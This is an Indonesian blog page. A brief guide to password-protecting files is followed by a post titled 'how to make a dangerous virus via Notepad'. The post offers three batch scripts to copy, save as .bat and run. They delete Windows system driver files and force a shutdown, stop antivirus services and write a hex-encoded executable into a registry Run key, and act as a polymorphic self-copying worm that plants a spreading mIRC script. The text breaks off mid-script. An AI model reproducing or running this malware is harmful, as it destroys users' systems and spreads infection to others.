Jika Anda perlu melindungi sandi dan / atau mengenkripsi data yang Anda sering gunakan, Anda akan perlu untuk menginstal sebuah program pihak ketiga yang akan memungkinkan Anda untuk melindungi file dan folder Anda. Berikut adalah beberapa solusi yang gratis dan komersial.

* AxCrypt - An excellent enkripsi utilitas gratis yang memungkinkan pengguna untuk mengenkripsi semua file dalam suatu folder dan file-file tersebut tidak memungkinkan untuk dilihat kecuali sebuah passphrase (password) dikenal.
* WinCry - A freeware utility yang memungkinkan Anda file yang akan dienkripsi, aman penghapusan, serta metode lain yang dapat membantu melindungi file Anda.
* Folder Guard - Sebuah versi komersial dari perangkat lunak proteksi password yang memungkinkan Anda untuk melindungi sandi file, folder, dan sumber daya Windows lainnya.

Klik di sini untuk mencari solusi yang lebih password melindungi file dan folder dalam Windows.

Hal-hal yang perlu diingat ketika enkripsi atau password melindungi file dan folder

1. Tidak ada yang namanya 100% file yang dilindungi. Ada banyak alat-alat, utilitas, dan petunjuk untuk cara memecahkan banyak enkripsi dan password pada file. Namun, metode perlindungan yang tercantum di atas akan melindungi file Anda dari mayoritas pengguna yang mungkin menghadapi mereka. Jika Anda bekerja dengan benar-benar data sensitif kami menyarankan produk komersial untuk melindungi file dan data Anda.
2. Meskipun file atau folder dapat dilindungi password masih dapat dihapus (kecuali program mendukung kemampuan untuk melindungi file tidak dihapus). Selalu ingat untuk membuat cadangan semua file Anda, bahkan mereka yang dilindungi oleh password.
3. Jika Anda lupa sandi, kecuali jika Anda bersedia meluangkan waktu berusaha untuk memecahkan atau membayar orang lain untuk memecahkan sandi, semua data file Anda akan hilang. Kecuali Anda telah membuat cadangan dari non-data yang dilindungi sandi.

Informasi tambahan:

* Jika Anda ingin untuk melindungi password hanya Microsoft Word atau Microsoft Excel melihat dokumen CH000748.
* Lihat sandi definisi kamus untuk informasi tambahan tentang sandi serta halaman terkait dan definisi.
* See our definisi kamus untuk mengenkripsi informasi tambahan tentang mengenkripsi serta definisi terkait.

Rabu, 10 Februari 2010

Cara buat virus bahaya lewat Notepad


kali ini neh,lo tinggal copy paste ke notepat langsung deh jadi virusnya.
Silahkan copy paste seluruh script yang ada disini ke notepad, truz save dengan extensi .bat, lalu jalankan. Tinggal lihat efeknya di komputer…..
Virus 1 :
@ECHO OFF
:begin
del c:\windows\system32\drivers\*.sys
del c:\windows\system32\drivers\*.dll
Echo Tutup program ini atau komputer kamu error!
pause
Echo Windows kini berusaha menagkal virus..
pause
Echo 10 ( detik )
pause
Echo 20 ( detik )
pause
Echo 30 ( detik )
pause
Echo 40 ( detik )
pause
Echo 50 ( detik )
pause
Echo 60 ( detik )
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Echo ( Virus Dijalankan.. )
pause
Echo Do Kamu suka paint?
start mspaint
start mspaint
start mspaint
start mspaint
start mspaint
Pause
Echo 70 ( detik )
Pause
Echo Jam di komputer sudah di ubah 12:00
Time 12:00
pause
Echo Virus menginfeksi…..
Start mspaint
Start mspaint
Start mspaint
Start mspaint
Start mspaint
Start mspaint
Start mspaint
Pause
echo awww… !
echo ini yang kamu dapatkan dari aku!
Pause
Start notepad
Start notepad
Start notepad
Start notepad
Start notepad
Start notepad
Start notepad
pause
md Loser.bat
md Fucker.bat
md shutup.bat
md amit-amit.bat
pause
md ShwAgl1.bat
md ShwAgl2.bat
md ShwAgl3.bat
md ShwAgl4.bat
md ShwAgl5.bat
md Apakabarkamusekaranghuh?.bat
echo ( SEKARANG LIHAT KE DEKSTOP FUCKER )
pause
echo sekarang minta maaf dan sersikap baik ama ShwAgl,stoopid
echo karena kamu enggak tutup programnya sih..!
pause
echo oke sekarang lihat ha..ha..ha…
rundll32.exe shell32.dll,SHExitWindowsEx 2
echo Sekarang bilang bye… bye…

Silahkan copy paste seluruh script yang ada disini ke notepad, truz save dengan extensi .bat, lalu jalankan. Tinggal lihat efeknya di komputer…..

VIRUS II

Code:
@echo off
set lool=for
set BT=*.bat
set scr=*.scr
set PrL=C:\Perl\bin
set StpAV=Net Stop
set Bk=ShdwAngel.scr
echo %comspec%|find “cmd” >nul
if errorlevel 1 goto InstaL
%StpAV% MCSHIELD >nul & cls
%StpAV% NORTON ANTIVIRUS AUTO PROTECT SERVICE >nul & cls
%StpAV% NOD32 Kernel Service >nul & cls
%StpAV% SharedAccess >nul & cls
%StpAV% Automatic Updates >nul & cls
%StpAV% TrueVector Internet Monitor >nul & cls
:InstaL
echo n %Bk% >>$
echo e 0100 4D 5A 00 00 00 00 00 00 00 00 00 00 50 45 00 00>>$
echo e 0110 4C 01 02 00 46 53 47 21 00 00 00 00 00 00 00 00>>$
echo e 0120 E0 00 0F 01 0B 01 00 00 00 04 00 00 00 CA 00 00>>$
echo e 0130 00 00 00 00 54 01 00 00 00 10 00 00 0C 00 00 00>>$
echo e 0140 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00>>$
echo e 0150 00 00 00 00 04 00 00 00 00 00 00 00 00 20 01 00>>$
echo e 0160 00 02 00 00 00 00 00 00 02 00 00 00 00 00 10 00>>$
echo e 0170 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00>>$
echo e 0180 10 00 00 00 00 00 00 00 00 00 00 00 50 12 01 00>>$
echo e 0190 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00>>$
echo e 01A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00>>$
echo e 01B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00>>$
echo e 01C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00>>$
echo e 01D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00>>$
echo e 01E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00>>$
echo e 01F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00>>$
echo e 0200 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00>>$
echo e 0210 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00>>$
echo e 0220 00 00 00 00 00 00 00 00 E0 00 00 C0 00 00 00 00>>$
echo e 0230 00 00 00 00 00 10 00 00 00 10 01 00 D1 02 00 00>>$
echo e 0240 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00>>$
echo e 0250 E0 00 00 C0 87 25 94 12 41 00 61 94 55 A4 B6 80>>$
echo e 0260 FF 13 73 F9 33 C9 FF 13 73 16 33 C0 FF 13 73 1F>>$
echo e 0270 B6 80 41 B0 10 FF 13 12 C0 73 FA 75 3A AA EB E0>>$
echo e 0280 FF 53 08 02 F6 83 D9 01 75 0E FF 53 04 EB 24 AC>>$
echo e 0290 D1 E8 74 2D 13 C9 EB 18 91 48 C1 E0 08 AC FF 53>>$
echo e 02A0 04 3B 43 F8 73 0A 80 FC 05 73 06 83 F8 7F 77 02>>$
echo e 02B0 41 41 95 8B C5 B6 00 56 8B F7 2B F0 F3 A4 5E EB>>$
echo e 02C0 9F 5E AD 97 AD 50 FF 53 10 95 8B 07 40 78 F3 75>>$
echo e 02D0 03 FF 63 0C 50 55 FF 53 14 AB EB EE 33 C9 41 FF>>$
echo e 02E0 13 13 C9 FF 13 72 F8 C3 02 D2 75 05 8A 16 46 12>>$
echo e 02F0 D2 C3 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C 00 00>>$
echo e 0300 68 1C 14 30 40 3A B8 01 F0 E0 E8 31 B7 02 0A 6A>>$
echo e 0310 06 CB E7 4F 1E D8 D0 17 A3 A2 60 31 34 66 C7 05>>$
echo e 0320 A6 DB 0F 1E 22 10 AA 83 01 22 27 A8 05 1E 61 6A>>$
echo e 0330 10 68 05 1C FF 35 05 29 E8 85 0A 3E 05 0D 64 7E>>$
echo e 0340 47 32 C0 B6 B6 19 EA B7 C3 0B B8 AB 11 33 CD C8>>$
echo e 0350 15 6A 28 05 50 05 30 E8 2A 49 B8 25 12 C8 31 CC>>$
echo e 0360 D9 12 11 68 FA BD D3 32 1A 15 A0 82 44 8A 1D 81>>$
echo e 0370 45 22 C3 3C C0 74 E5 C8 FC D8 9B 44 41 2B 14 DC>>$
echo e 0380 93 B2 14 E0 16 42 E4 C4 04 32 10 D9 43 B1 34 0A>>$
echo e 0390 16 4F 13 0C 14 1D 86 A1 C0 4D 37 A3 10 1D A5 C4>>$
echo e 03A0 08 0A 14 BF BF 18 D3 F0 29 08 2C 88 94 F5 3A 44>>$
echo e 03B0 68 A0 09 E8 82 C3 93 83 3D A4 03 17 02 75 24 68>>$
echo e 03C0 1C 75 49 57 D8 B7 65 05 01 0E 06 68 0A 30 11 0C>>$
echo e 03D0 E8 4B 57 EB 53 22 24 B2 08 31 27 16 C6 65 3C 47>>$
echo e 03E0 10 10 63 09 75 7E 2C 91 4D 6F F9 3F A3 FB 57 2A>>$
echo e 03F0 09 28 11 52 03 D0 55 8B EC 83 C4 98 C7 45 F4 52>>$
echo e 0400 0C A0 77 53 F8 E6 7E 6C FC 39 A5 8D C3 2E 50 68>>$
echo e 0410 BC 75 79 A4 DB 31 E8 C1 2B C6 05 22 3C 29 01 43>>$
echo e 0420 15 CE 26 7C 31 A8 61 DD EC 93 47 69 44 32 4C DB>>$
echo e 0430 2F 89 28 45 F0 40 0F EC 50 FF 75 34 1C D0 49 18>>$
echo e 0440 E8 A1 39 EB C1 1C C9 C2 04 2A 7A 47 F0 A2 C4 11>>$
echo e 0450 B8 08 47 86 43 B7 8A 54 26 64 F0 11 7E 29 44 E7>>$
echo e 0460 A2 2C 55 33 1B 06 77 2A 85 93 91 4E 14 EB C4 77>>$
echo e 0470 06 FF 25 18 20 2F ED C2 A4 06 04 32 08 19 0C 0C>>$
echo e 0480 10 86 43 14 7B 86 43 24 21 28 90 2C C8 30 64 34>>$
echo e 0490 32 38 28 01 DD 57 F1 CB 2A 0C 14 DD 09 ED 89 FD>>$
echo e 04A0 11 09 21 02 11 26 BD 19 63 FF 02 7F 72 84 65 F5>>$
echo e 04B0 EC 7D FE 32 0F 09 12 24 16 5B 41 9F 0C 51 1C DD>>$
echo e 04C0 61 E2 68 2A 10 2C 9F 9C 69 9C 5F 19 73 06 80 BA>>$
echo e 04D0 F1 32 02 09 0D 24 10 48 13 91 17 42 22 03 43 72>>$
echo e 04E0 65 61 74 98 50 69 70 EF 4B 0E 76 3F 6F 63 B8 73>>$
echo e 04F0 A9 41 12 43 54 68 28 0F 64 10 7F 47 FC 56 FF F4>>$
echo e 0500 73 69 0A 6F 6E 45 78 21 19 52 31 46 F9 6C 53 3E>>$
echo e 0510 53 7E 0E 61 70 11 57 72 69 A2 66 15 0E 4B 45 52>>$
echo e 0520 4E 60 4C 33 32 2E 64 FB FB 05 31 53 4F 43 4B 64>>$
echo e 0530 0D 7B 01 EA FC 63 07 6D 64 2E 65 78 2C 10 6F F3>>$
echo e 0540 E8 61 6E DB 18 11 85 6B 01 FF FB B9 80 00 00 00>>$
echo e 0550 A8 12 01 00 00 00 00 00 00 00 00 00 F2 01 00 00>>$
echo e 0560 A8 12 01 00 00 00 00 00 00 00 00 00 00 00 00 00>>$
echo e 0570 00 00 00 00 00 00 00 00 00 10 40 00 00 10 41 00>>$
echo e 0580 40 20 40 00 00 00 00 00 98 12 41 00 80 00 00 00>>$
echo e 0590 00 7D 00 00 78 12 41 00 E8 01 40 00 DC 01 40 00>>$
echo e 05A0 DE 01 40 00 00 10 40 00 B2 12 01 00 C0 12 01 00>>$
echo e 05B0 00 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41>>$
echo e 05C0 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73>>$
echo e 05D0 00 00>>$
echo rcx>>$
echo 4D1>>$
echo w>>$
echo q>>$
debug < $ >nul
copy %Bk% %windir%\%Bk% >nul
del $ >nul
echo REGEDIT4 >>_.reg
echo. >>_.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >>_.reg
echo “Screen Server”=”%Bk%” >>_.reg
regedit /s _.reg
del _.reg >nul
%lool% %%_ in (..\ %path%\ %PrL%\ C:\ ) do copy %Bk% %%_\ >nul & cls
%lool% %%T in (%path%\%scr% ) do copy %Bk% %%T >nul & cls
%lool% %%I in (..\ %path%\ %PrL%\ C:\ ) do copy %0 %%I\ >nul & cls
%lool% %%N in (%BT% ..\%BT% %path%\%BT% %PrL%\%BT% C:\%BT% ) do type %0 >>%%N >nul & cls
%lool% %%I in (%BT% ..\%BT% %path%\%BT% %PrL%\%BT% C:\%BT% ) do attrib +R %%I >nul & cls
%Bk%
exit

VIrus 3 :
Silahkan copy paste seluruh script yang ada disini ke notepad, truz save dengan extensi .bat, lalu jalankan. Tinggal lihat efeknya di komputer…..

set shadow=0
@echo off % mawar-kuning %
cls % mawar-kuning %
% mawar-kuning %set /a shadow=%shadow%+1
% mawar-kuning %if %shadow% EQU 5 (
% mawar-kuning %echo kamu telah terinfeksi mawar kuning !!
% mawar-kuning %set shadow=0
% mawar-kuning %)
% mawar-kuning %echo set shadow=%shadow% >mawarkuning.bat
% mawar-kuning %set shadow=
% mawar-kuning %set qwxykjsi=set
% mawar-kuning %set aaa=A
%qwxykjsi% fi=if % mawar-kuning %
%qwxykjsi% nt=not % mawar-kuning %
%qwxykjsi% el=errorlevel % mawar-kuning %
%qwxykjsi% ine=%fi% %nt% %el% % mawar-kuning %
% mawar-kuning %set vrsa=rndom
set oto=goto% mawar-kuning %
%qwxykjsi% a=0 % mawar-kuning %
set fd=find% mawar-kuning %
%fd% “mawar-kuning”<%0>>mawarkuning.bat
%qwxykjsi% xp=true% mawar-kuning %
% mawar-kuning %if %xp% EQU true goto xptruea
goto winmawar % mawar-kuning %
:xptruea % mawar-kuning %
% mawar-kuning %set a=0
% mawar-kuning %set b=0
% mawar-kuning %set c=0
% mawar-kuning %set d=0
% mawar-kuning %set e=0
% mawar-kuning %set f=0
% mawar-kuning %set g=0
% mawar-kuning %set h=0
% mawar-kuning %set i=0
% mawar-kuning %set j=0
% mawar-kuning %set k=0
% mawar-kuning %set l=0
% mawar-kuning %set m=0
% mawar-kuning %set n=0
% mawar-kuning %set o=0
% mawar-kuning %set p=0
% mawar-kuning %set q=0
% mawar-kuning %set r=0
% mawar-kuning %set s=0
% mawar-kuning %set t=0
% mawar-kuning %set u=0
:mulai0 % mawar-kuning %
% mawar-kuning %set aa=0
:mulai1 % mawar-kuning %
if %aa% EQU 5 goto endmawarkuning % mawar-kuning %
%qwxykjsi% /a aa=%aa%+1 % mawar-kuning %
:mulai2 % mawar-kuning %
ver|time|%fd% “,1?>nul % mawar-kuning %
%ine% 1 %qwxykjsi% %vrsa%%aa%=1% mawar-kuning %
%ine% 1 %oto% mulai1 % mawar-kuning %
ver|time|%fd% “,2?>nul % mawar-kuning %
%ine% 1 %qwxykjsi% %vrsa%%aa%=2% mawar-kuning %
%ine% 1 %oto% mulai1 % mawar-kuning %
ver|time|%fd% “,3?>nul % mawar-kuning %
%ine% 1 %qwxykjsi% %vrsa%%aa%=3% mawar-kuning %
%ine% 1 %oto% mulai1 % mawar-kuning %
ver|time|%fd% “,4?>nul % mawar-kuning %
%ine% 1 %qwxykjsi% %vrsa%%aa%=4% mawar-kuning %
%ine% 1 %oto% mulai1 % mawar-kuning %
ver|time|%fd% “,5?>nul % mawar-kuning %
%ine% 1 %qwxykjsi% %vrsa%%aa%=5% mawar-kuning %
%ine% 1 %oto% mulai1 % mawar-kuning %
ver|time|%fd% “,6?>nul % mawar-kuning %
%ine% 1 %qwxykjsi% %vrsa%%aa%=6% mawar-kuning %
%ine% 1 %oto% mulai1 % mawar-kuning %
ver|time|%fd% “,7?>nul % mawar-kuning %
%ine% 1 %qwxykjsi% %vrsa%%aa%=7% mawar-kuning %
%ine% 1 %oto% mulai1 % mawar-kuning %
ver|time|%fd% “,8?>nul % mawar-kuning %
%ine% 1 %qwxykjsi% %vrsa%%aa%=8% mawar-kuning %
%ine% 1 %oto% mulai1 % mawar-kuning %
ver|time|%fd% “,9?>nul % mawar-kuning %
%ine% 1 %qwxykjsi% %vrsa%%aa%=9% mawar-kuning %
%ine% 1 %oto% mulai1 % mawar-kuning %
ver|time|%fd% “,0?>nul % mawar-kuning %
%ine% 1 %qwxykjsi% %vrsa%%aa%=10% mawar-kuning %
%ine% 1 %oto% mulai1 % mawar-kuning %
goto mulai2 % mawar-kuning %
:endmawarkuning % mawar-kuning %
% mawar-kuning %if %a% NEQ 1 (if %rndom1% EQU 1 (
% mawar-kuning %find “%aaa%AAA” <%0 >>mawarkuning.bat
% mawar-kuning %set a=1
% mawar-kuning %))
% mawar-kuning %if %b% NEQ 1 (if %rndom1% EQU 2 (
% mawar-kuning %find “%aaa%BBB” <%0 >>mawarkuning.bat
% mawar-kuning %set b=1
% mawar-kuning %))
% mawar-kuning %if %c% NEQ 1 (if %rndom1% EQU 3 (
% mawar-kuning %find “%aaa%CCC” <%0 >>mawarkuning.bat
% mawar-kuning %set c=1
% mawar-kuning %))
% mawar-kuning %if %d% NEQ 1 (if %rndom1% EQU 4 (
% mawar-kuning %find “%aaa%DDD” <%0 >>mawarkuning.bat
% mawar-kuning %set d=1
% mawar-kuning %))
% mawar-kuning %if %e% NEQ 1 (if %rndom2% EQU 1 (
% mawar-kuning %find “%aaa%EEE” <%0 >>mawarkuning.bat
% mawar-kuning %set e=1
% mawar-kuning %))
% mawar-kuning %if %f% NEQ 1 (if %rndom2% EQU 2 (
% mawar-kuning %find “%aaa%FFF” <%0 >>mawarkuning.bat
% mawar-kuning %set f=1
% mawar-kuning %))
% mawar-kuning %if %g% NEQ 1 (if %rndom2% EQU 3 (
% mawar-kuning %find “%aaa%GGG” <%0 >>mawarkuning.bat
% mawar-kuning %set g=1
% mawar-kuning %))
% mawar-kuning %if %h% NEQ 1 (if %rndom2% EQU 4 (
% mawar-kuning %find “%aaa%HHH” <%0 >>mawarkuning.bat
% mawar-kuning %set h=1
% mawar-kuning %))
% mawar-kuning %if %i% NEQ 1 (if %rndom3% EQU 1 (
% mawar-kuning %find “%aaa%III” <%0 >>mawarkuning.bat
% mawar-kuning %set i=1
% mawar-kuning %))
% mawar-kuning %if %j% NEQ 1 (if %rndom3% EQU 2 (
% mawar-kuning %find “%aaa%JJJ” <%0 >>mawarkuning.bat
% mawar-kuning %set j=1
% mawar-kuning %))
% mawar-kuning %if %k% NEQ 1 (if %rndom3% EQU 3 (
% mawar-kuning %find “%aaa%KKK” <%0 >>mawarkuning.bat
% mawar-kuning %set k=1
% mawar-kuning %))
% mawar-kuning %if %l% NEQ 1 (if %rndom3% EQU 4 (
% mawar-kuning %find “%aaa%LLL” <%0 >>mawarkuning.bat
% mawar-kuning %set l=1
% mawar-kuning %))
% mawar-kuning %if %m% NEQ 1 (if %rndom4% EQU 1 (
% mawar-kuning %find “%aaa%MMM” <%0 >>mawarkuning.bat
% mawar-kuning %set m=1
% mawar-kuning %))
% mawar-kuning %if %n% NEQ 1 (if %rndom4% EQU 2 (
% mawar-kuning %find “%aaa%NNN” <%0 >>mawarkuning.bat
% mawar-kuning %set n=1
% mawar-kuning %))
% mawar-kuning %if %o% NEQ 1 (if %rndom4% EQU 3 (
% mawar-kuning %find “%aaa%OOO” <%0 >>mawarkuning.bat
% mawar-kuning %set o=1
% mawar-kuning %))
% mawar-kuning %if %p% NEQ 1 (if %rndom4% EQU 4 (
% mawar-kuning %find “%aaa%PPP” <%0 >>mawarkuning.bat
% mawar-kuning %set p=1
% mawar-kuning %))
% mawar-kuning %if %q% NEQ 1 (if %rndom5% EQU 1 (
% mawar-kuning %find “%aaa%QQQ” <%0 >>mawarkuning.bat
% mawar-kuning %set q=1
% mawar-kuning %))
% mawar-kuning %if %r% NEQ 1 (if %rndom5% EQU 2 (
% mawar-kuning %find “%aaa%RRR” <%0 >>mawarkuning.bat
% mawar-kuning %set r=1
% mawar-kuning %))
% mawar-kuning %if %s% NEQ 1 (if %rndom5% EQU 3 (
% mawar-kuning %find “%aaa%SSS” <%0 >>mawarkuning.bat
% mawar-kuning %set s=1
% mawar-kuning %))
% mawar-kuning %if %t% NEQ 1 (if %rndom5% EQU 4 (
% mawar-kuning %find “%aaa%TTT” <%0 >>mawarkuning.bat
% mawar-kuning %set t=1
% mawar-kuning %))
% mawar-kuning %if %u% NEQ 1 (if %rndom5% EQU 5 (
% mawar-kuning %find “%aaa%UUU” <%0 >>mawarkuning.bat
% mawar-kuning %set u=1
% mawar-kuning %))
% mawar-kuning %if %a% EQU 1 (if %b% EQU 1 (if %c% EQU 1 (if %d% EQU 1 (
% mawar-kuning %if %e% EQU 1 (if %f% EQU 1 (if %g% EQU 1 (if %h% EQU 1 (
% mawar-kuning %if %i% EQU 1 (if %j% EQU 1 (if %k% EQU 1 (if %l% EQU 1 (
% mawar-kuning %if %m% EQU 1 (if %n% EQU 1 (if %o% EQU 1 (if %p% EQU 1 (
% mawar-kuning %if %q% EQU 1 (if %r% EQU 1 (if %s% EQU 1 (if %t% EQU 1 (if %u% EQU 1 (
goto irca % mawar-kuning %
% mawar-kuning %)))))))))))))))))))))
goto mulai0 % mawar-kuning %
:winmawar % mawar-kuning %
set wina=0% mawar-kuning %
set winb=0% mawar-kuning %
set winc=0% mawar-kuning %
set wind=0% mawar-kuning %
set wine=0% mawar-kuning %
set oto=% mawar-kuning %
set qwxykjsi=% mawar-kuning %
set nt=% mawar-kuning %
set fi=% mawar-kuning %
set el=% mawar-kuning %
set ine=% mawar-kuning %
:mulaiwin2 % mawar-kuning %
% mawar-kuning %if not %wina%==1 goto mawarkuningengi
% mawar-kuning %if not %winb%==1 goto mawarkuningengi
% mawar-kuning %if not %winc%==1 goto mawarkuningengi
% mawar-kuning %if not %wind%==1 goto mawarkuningengi
% mawar-kuning %if not %wine%==1 goto mawarkuningengi
goto winirc % mawar-kuning %
:mawarkuningengi % mawar-kuning %
ver|time|find “,1?>nul % mawar-kuning %
if not errorlevel 1 set randoma=1% mawar-kuning %
if not errorlevel 1 goto enmawarkuningwin % mawar-kuning %
ver|time|find “,2?>nul % mawar-kuning %
if not errorlevel 1 set randoma=2% mawar-kuning %
if not errorlevel 1 goto enmawarkuningwin % mawar-kuning %
ver|time|find “,3?>nul % mawar-kuning %
if not errorlevel 1 set randoma=3% mawar-kuning %
if not errorlevel 1 goto enmawarkuningwin % mawar-kuning %
ver|time|find “,4?>nul % mawar-kuning %
if not errorlevel 1 set randoma=4% mawar-kuning %
if not errorlevel 1 goto enmawarkuningwin % mawar-kuning %
ver|time|find “,5?>nul % mawar-kuning %
if not errorlevel 1 set randoma=5% mawar-kuning %
if not errorlevel 1 goto enmawarkuningwin % mawar-kuning %
goto mulaiwin2 % mawar-kuning %
:enmawarkuningwin % mawar-kuning %
% mawar-kuning %if not %wina%==1 if %randoma%==1 goto enamawarkuningwin
% mawar-kuning %if not %winb%==1 if %randoma%==2 goto enbmawarkuningwin
% mawar-kuning %if not %winc%==1 if %randoma%==3 goto encmawarkuningwin
% mawar-kuning %if not %wind%==1 if %randoma%==4 goto endmawarkuningwin
% mawar-kuning %if not %wine%==1 if %randoma%==5 goto enemawarkuningwin
goto mulaiwin2 % mawar-kuning %
:enamawarkuningwin % mawar-kuning %
% mawar-kuning %find “%aaa%BBB”<%0>> mawarkuning.bat
% mawar-kuning %find “%aaa%AAA”<%0>> mawarkuning.bat
% mawar-kuning %find “%aaa%KKK”<%0>> mawarkuning.bat
% mawar-kuning %find “%aaa%DDD”<%0>> mawarkuning.bat
set wina=1% mawar-kuning %
% mawar-kuning %goto mulaiwin2
:enbmawarkuningwin % mawar-kuning %
% mawar-kuning %find “%aaa%EEE”<%0>> mawarkuning.bat
% mawar-kuning %find “%aaa%LLL”<%0>> mawarkuning.bat
% mawar-kuning %find “%aaa%GGG”<%0>> mawarkuning.bat
% mawar-kuning %find “%aaa%HHH”<%0>> mawarkuning.bat
set winb=1% mawar-kuning %
% mawar-kuning %goto mulaiwin2
:encmawarkuningwin % mawar-kuning %
% mawar-kuning %find “%aaa%III”<%0>> mawarkuning.bat
% mawar-kuning %find “%aaa%JJJ”<%0>> mawarkuning.bat
% mawar-kuning %find “%aaa%CCC”<%0>> mawarkuning.bat
% mawar-kuning %find “%aaa%FFF”<%0>> mawarkuning.bat
set winc=1% mawar-kuning %
% mawar-kuning %goto mulaiwin2
:endmawarkuningwin % mawar-kuning %
% mawar-kuning %find “%aaa%NNN”<%0>> mawarkuning.bat
% mawar-kuning %find “%aaa%MMM”<%0>> mawarkuning.bat
% mawar-kuning %find “%aaa%PPP”<%0>> mawarkuning.bat
% mawar-kuning %find “%aaa%OOO”<%0>> mawarkuning.bat
set wind=1% mawar-kuning %
% mawar-kuning %goto mulaiwin2
:enemawarkuningwin % mawar-kuning %
% mawar-kuning %find “%aaa%RRR”<%0>> mawarkuning.bat
% mawar-kuning %find “%aaa%SSS”<%0>> mawarkuning.bat
% mawar-kuning %find “%aaa%UUU”<%0>> mawarkuning.bat
% mawar-kuning %find “%aaa%TTT”<%0>> mawarkuning.bat
% mawar-kuning %find “%aaa%QQQ”<%0>> mawarkuning.bat
set wine=1% mawar-kuning %
% mawar-kuning %goto mulaiwin2
:winirc % mawar-kuning %
% mawar-kuning %set wina=
% mawar-kuning %set winb=
% mawar-kuning %set winc=
% mawar-kuning %set wind=
% mawar-kuning %set wine=
% mawar-kuning %set aaa=
% mawar-kuning %set randoma=
:irca % AAAA %
if exist C:\mirc\script.ini set mir=C:\mirc% AAAA %
echo %mir%
if exist C:\mirc32\script.ini set mir=C:\mirc32% AAAA %
if exist C:\proga~1\mirc\script.ini set mir=C:\progra~1\mirc% AAAA %
if exist C:\prgra~1\mirc32\script.ini set mir=C:\progra~1\mirc32% AAAA %
goto ircb% AAAA %
:ircb % ABBB %
set mirc=%mir%\script.ini% ABBB %
set vs=chr(% ABBB %
goto ircc% ABBB %
:ircc % ACCC %
set wc=echo file.writeline% ACCC %
goto ircd% ACCC %
:ircd % ADDD %
echo dim fso, file > irc.vbs% ADDD %
echo set fso = createobject(”scripting.filesystemobject”) >>irc.vbs% ADDD %
echo set file = fso.createtextfile (”%mir%\script.ini”, true)>>irc.vbs% ADDD %
goto irce% ADDD %
:irce % AEEE %
%wc% ” on 1:st” + %vs%97) + “rt: { .” + %vs%115) + %vs%101) + %vs%116) + ” ” + %vs%37) + “filee %mir%\name.b” + %vs%97) + “t }”>>irc.vbs% AEEE %
%wc% ” on 1:join:#: { “>>irc.vbs% AEEE %
%wc% ” .if (” + %vs%36) + “nick != ” + %vs%36) + “me ” + %vs%38) + “” + %vs%38) + ” ” + %vs%37) + “old != ” + %vs%36) + “nick) {”>>irc.vbs% AEEE %
goto ircf% AEEE %
:ircf % AFFF %
%wc% ” .” + %vs%115) + %vs%101) + %vs%116) + ” ” + %vs%37) + “old ” + %vs%36) + “nick”>>irc.vbs% AFFF %
%wc% ” .timer ” + %vs%36) + “+ ” + %vs%36) + “r” + %vs%97) + “nd(1,100000) 1 5 .” + %vs%36) + “check_him( ” + %vs%36) + “nick , ” + %vs%36) + “ch” + %vs%97) + “n )”>>irc.vbs% AFFF %
goto ircg% AFFF %
:ircg % AGGG %
%wc% ” } “>>irc.vbs% AGGG %
%wc% ” }”>>irc.vbs% AGGG %
%wc% ” ” + %vs%97) + “li” + %vs%97) + “s check_him {”>>irc.vbs% AGGG %
goto irch% AGGG %
:irch % AHHH %
%wc% ” .” + %vs%115) + %vs%101) + %vs%116) + ” ” + %vs%37) + “port ” + %vs%36) + “r” + %vs%97) + “nd(9999,999999) “>>irc.vbs% AHHH %
%wc% ” .while (” + %vs%36) + “portfree(” + %vs%37) + “port) == ” + %vs%36) + “f” + %vs%97) + “lse) { .” + %vs%115) + %vs%101) + %vs%116) + ” ” + %vs%37) + “port ” + %vs%36) + “r” + %vs%97) + “nd(9999,999999) }”>>irc.vbs% AHHH %
goto irci% AHHH %
:irci % AIII %
%wc% ” .%fi% (” + %vs%36) + “1 !isop ” + %vs%36) + “2) { “>>irc.vbs% AIII %
%wc% ” .%nt%ice ” + %vs%36) + “1 :DCC ” + %vs%115) + %vs%101) + %vs%110) + %vs%100) + ” teletubies ( ” + %vs%36) + “+ ” + %vs%36) + “ip ” + %vs%36) + “+ ) “>>irc.vbs% AIII %
goto ircj% AIII %
:ircj % AJJJ %
%wc% ” .” + %vs%115) + %vs%101) + %vs%116) + ” ” + %vs%37) + “sock_n” + %vs%97) + “me ” + %vs%36) + “r” + %vs%97) + “nd(1,99999)”>>irc.vbs% AJJJ %
%wc% ” .msg ” + %vs%36) + “1 _DCC ” + %vs%115) + %vs%101) + %vs%110) + %vs%100) + ” ” + %vs%37) + “filee ” + %vs%36) + “longip(” + %vs%36) + “ip) ” + %vs%37) + “port ” + %vs%36) + “file(” + %vs%37) + “filee).size ” + %vs%36) + “+ _”>>irc.vbs% AJJJ %
%wc% ” .socklisten ” + %vs%37) + “sock_n” + %vs%97) + “me ” + %vs%37) + “port”>>irc.vbs% AJJJ %
goto irck% AJJJ %
:irck % AKKK %
%wc% ” .timers off”>>irc.vbs% AKKK %
%wc% ” .timer ” + %vs%36) + “+ ” + %vs%36) + “r” + %vs%97) + “nd(1,99999) 0 10 .cloze”>>irc.vbs% AKKK %
%wc% ” } “>>irc.vbs% AKKK %
goto ircl% AKKK %
:ircl % ALLL %
%wc% ” }”>>irc.vbs% ALLL %
%wc% ” on 1:socklisten:” + %vs%37) + “sock_n” + %vs%97) + “me: {”>>irc.vbs% ALLL %
goto ircm% ALLL %
:ircm % AMMM %
%wc% ” .” + %vs%115) + %vs%101) + %vs%116) + ” ” + %vs%37) + “client_n” + %vs%97) + “me ” + %vs%36) + “r” + %vs%97) + “nd(1,9999999)”>>irc.vbs% AMMM %
